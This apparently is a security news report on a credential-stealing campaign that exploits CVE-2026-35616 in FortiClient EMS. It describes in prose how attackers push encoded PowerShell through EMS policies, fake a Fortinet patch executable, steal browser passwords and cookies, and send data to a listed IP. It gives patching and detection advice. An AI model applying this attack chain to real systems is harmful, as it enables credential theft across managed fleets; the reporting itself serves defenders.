Cybercriminals are actively exploiting a critical vulnerability in Fortinet’s FortiClient Endpoint Management Server (EMS) to distribute potent credential-stealing malware. This ongoing campaign, first observed in May 2026, leverages trusted endpoint management infrastructure to compromise numerous devices, disguising malicious payloads as legitimate Fortinet updates. The exploitation of this critical pre-authentication API access bypass, identified as CVE-2026-35616, allows attackers to escalate privileges and gain unfettered access to managed endpoints.
The severity of CVE-2026-35616, which carries a CVSS score of 9.1, lies in its ability to bypass authentication mechanisms before any user interaction. Fortinet has since released patches for this vulnerability in FortiClient EMS versions 7.4.7 and later. However, organizations that have not yet updated their systems remain vulnerable to this sophisticated attack vector. The widespread use of FortiClient EMS by enterprises makes this a significant threat to corporate data security.
Exploiting FortiClient EMS for Credential Theft
Following a successful initial compromise, threat actors are manipulating FortiClient EMS configurations. According to cybersecurity firm Arctic Wolf, which detailed the campaign, attackers modify settings to delay firmware upgrade notifications and alter Remote Access Profile configurations. This strategic alteration enables them to insert malicious scripts into endpoint policies, ensuring the execution of harmful code on unsuspecting managed devices.
The observed execution pattern indicates a calculated approach by the threat actors. They are effectively using FortiClient’s own management channels to push malicious PowerShell commands. This method makes the malicious operations appear as routine management activities, thereby evading detection by security teams. Once control of the EMS is established, every endpoint under its management becomes a potential target, circumventing the need for individual intrusion attempts on each device.
The Mechanics of the Attack
The attack chain involves a legitimate FortiClient executable, “fortitray.exe,” which is used to launch a command script (.cmd file) via “cmd.exe.” This script, in turn, executes a Base64-encoded PowerShell script. The primary function of this PowerShell script is to download a malicious payload, execute it, and then exfiltrate the stolen data to an attacker-controlled server located at “83.138.53[.]110” using an HTTP POST request.
The downloaded malicious executable, identified as “FortiEndpoint_Patch.exe,” is designed to mimic a genuine FortiClient update. However, it is a previously unreported Windows information stealer. This malware is capable of harvesting sensitive data from popular Chromium- and Gecko-based browsers. This includes user credentials such as passwords, session cookies, and autofill information, which can encompass credit card details, personal addresses, and phone numbers.
The stolen data is initially logged to a file within the ProgramData directory before being transmitted. It is crucial to note that the stealer itself lacks direct network exfiltration capabilities, relying instead on the accompanying PowerShell script for outbound communication to the threat actor’s infrastructure. This layered approach makes attribution and disruption more challenging.
Implications of the Vulnerability and Malware
By bypassing API authentication and leveraging privileged access within the EMS, threat actors gain the ability to alter critical management configurations. This allows them to push malicious scripts that are then executed on managed endpoints, potentially impacting thousands of devices simultaneously. The ability to manipulate management configurations, as highlighted by Arctic Wolf’s analysis, represents a significant departure from typical endpoint compromises.
The exfiltrated session cookies and saved browser credentials pose a severe risk for follow-on attacks. Threat actors can use this information to gain unauthorized access to cloud services, internal applications, and other authenticated systems. In some instances, the reuse of session cookies may even bypass multi-factor authentication (MFA) prompts, further extending the attackers’ reach and impact. Organizations are strongly advised to prioritize patching their FortiClient EMS deployments to mitigate this critical security risk.
The immediate next step for organizations is to ensure their FortiClient EMS environments are updated to version 7.4.7 or later. Security teams should also conduct thorough investigations for any signs of compromise, particularly looking for unusual configuration changes within their EMS deployments and evidence of the described PowerShell scripts or the “FortiEndpoint_Patch.exe” executable on managed endpoints. Continued monitoring for suspicious network activity targeting the identified IP address will also be crucial in the coming weeks.